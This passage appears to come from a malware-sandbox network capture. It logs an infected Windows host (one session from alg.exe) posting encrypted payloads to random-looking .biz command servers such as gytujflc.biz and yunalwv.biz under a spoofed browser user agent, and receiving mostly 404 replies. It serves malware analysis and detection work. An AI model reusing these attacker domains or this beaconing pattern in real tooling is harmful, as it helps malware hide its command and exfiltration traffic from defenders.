                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.047622919 CET778OUTData Raw: 49 75 ba bd ad a6 54 ad fe 02 00 00 9c 72 4a 61 a8 37 9e 0d ad 07 d3 58 f6 46 41 6c 97 4c f9 51 ed 05 b1 5d a2 28 0f 99 83 d1 b6 e6 fa 39 fb 19 1b 2c 1d 0e 5f 9d cd 48 09 53 51 f1 4a 07 a4 b6 38 7d 09 32 54 a7 eb 10 91 f4 8e 57 f2 44 89 34 67 3f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: IuTrJa7XFAlLQ](9,_HSQJ8}2TWD4g?|="F:Xq7$f$Ub+W]W %sbRE2;C^*G$Mv-j2HL],1/*ij[w@nz0'-JE4RFby
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.885859966 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=bdd6c6ea2a6f78c21b5e0a69ce5d0adf|155.94.241.187|1731920295|1731920295|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      77192.168.2.750056208.100.26.24580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.599620104 CET348OUTPOST /nnuy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.599632978 CET842OUTData Raw: 33 55 8e fd 8f a8 a2 da 3e 03 00 00 00 a9 d2 b0 f9 e7 ca 6a 72 b3 b1 e4 62 1f 3f 40 e0 92 8b b2 ba e6 36 4a ef fb df d6 00 fb 03 91 a9 25 f0 22 cf 94 5c 74 dc 1c fa fb 1b b2 e0 aa 53 ca 27 e6 bc 70 cc cc c3 b7 d6 82 37 0b a9 17 f1 70 90 b5 b9 a8
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 3U>jrb?@6J%"\tS'p7pU&bnFY".##!DT|7%>{~zb&1cbt+j}JF7j:gb<GZs>9sV6|A%u`]f,vQeAq93
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.237180948 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.238301992 CET346OUTPOST /sv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.238301992 CET842OUTData Raw: 61 55 c3 45 49 d1 eb 3a 3e 03 00 00 f1 b3 9e 8c 32 68 25 5a df b2 19 18 c3 3d de ce 2b ce ac a1 d8 00 b2 36 a3 24 75 a6 43 50 bd a3 e6 b9 51 3b 29 41 66 65 9e eb f7 e1 2f 6a dc 9b 53 3b 6f 5e d6 1d 7a a3 30 a7 fd 9e 10 4e e2 d6 93 7f 8b 81 4e c1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: aUEI:>2h%Z=+6$uCPQ;)Afe/jS;o^z0NN@Tkvo=qT@zd'?L46VB%iZH}vL!E(+~'AvL1/e9l2&"F#{yx4"b>*K4<
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.383516073 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.399554014 CET356OUTPOST /hunwmwyhqkxby HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.399584055 CET842OUTData Raw: 9c a2 d5 5e 8d 0f 08 8f 3e 03 00 00 57 bb 55 80 c8 a3 53 70 ab f0 6a e8 ac 09 94 d6 14 ad 80 86 f7 98 bb b3 07 c7 a4 2e 54 b9 17 0f 8c 8c 0c ab f1 df 3f 8e e4 ec e6 c2 3c f8 1a 00 e9 35 e4 89 e3 10 70 14 90 c3 47 f9 7a 62 4c b4 9e 6d 0a 4a 37 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: ^>WUSpj.T?<5pGzbLmJ7lcED&hYP{qOA%oL32;[6UJigj5$Q\P/?!_{meM-\S{@~@ULOB7FS#qS*By
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.545331001 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.549509048 CET352OUTPOST /ehsrasnoy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.549509048 CET842OUTData Raw: 68 a7 15 fd a0 d4 4f 46 3e 03 00 00 48 d8 da 4b 94 cb 99 46 e8 d5 b4 9c 8f 12 ef c0 f1 ba e9 ad 51 9a 3a 90 cb c6 f3 61 3d da ad a6 da dc 96 b8 c5 e1 1a 03 7b b6 5c 4b fe f7 8d 46 5f f3 7f 5f 3e a0 f8 c9 ba 19 ac e7 d2 34 f0 a8 7a f9 85 7c 30 fe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: hOF>HKFQ:a={\KF__>4z|0 1kPs{MMA U+l2!]Zb%ft(#11Q!e,\.,#])g*o64{;iCArI qH^deX}>Li:/
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.694561958 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.604932070 CET353OUTPOST /xnflybxi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.605026007 CET842OUTData Raw: 37 3a 0d e9 89 81 bf 85 3e 03 00 00 5b 27 7b 26 d8 02 dd 4c 0b 18 cf 60 1f 51 bf 8c 83 1f 1d 12 d4 0f 0b 4e 80 6e ff 4a a3 5a c6 30 ad 21 b4 66 fb 29 30 dd 3c 51 2e b4 a8 f6 84 c4 af d4 c0 a5 a5 dc 10 b2 88 2d 8b 9b 8a 06 eb 34 37 02 65 11 92 82
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 7:>['{&L`QNnJZ0!f)0<Q.-47e8hUgt1.5Y.3aC30|apdne3d$2L+;ANf !3'qY}{JpCVOF4^0xnL
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.932612896 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:59:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.933841944 CET352OUTPOST /hijuvcy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:05.933867931 CET842OUTData Raw: 66 a0 86 08 16 a0 93 f3 3e 03 00 00 e6 0d 48 5f 5b 20 80 66 b3 21 6f cc 0e 3c fc 35 d3 a7 d7 01 36 54 32 57 b8 48 30 e0 9f fc 82 02 79 6a 5a 84 79 12 38 51 3a ab 02 b0 1e 30 98 12 40 74 ad 42 84 6f 50 6f a5 e3 b0 43 e3 b9 2f 79 32 d8 c4 bb 30 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: f>H_[ f!o<56T2WH0yjZy8Q:0@tBoPoC/y20\^Z M}S*!miqftSBH@*CoQLdM'2g%2..pTs{P[U"6wk@*SE6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:59:06.080708981 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:59:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      78192.168.2.7500573.254.94.185805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.167325974 CET357OUTPOST /fflfjsnvrvmguebc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
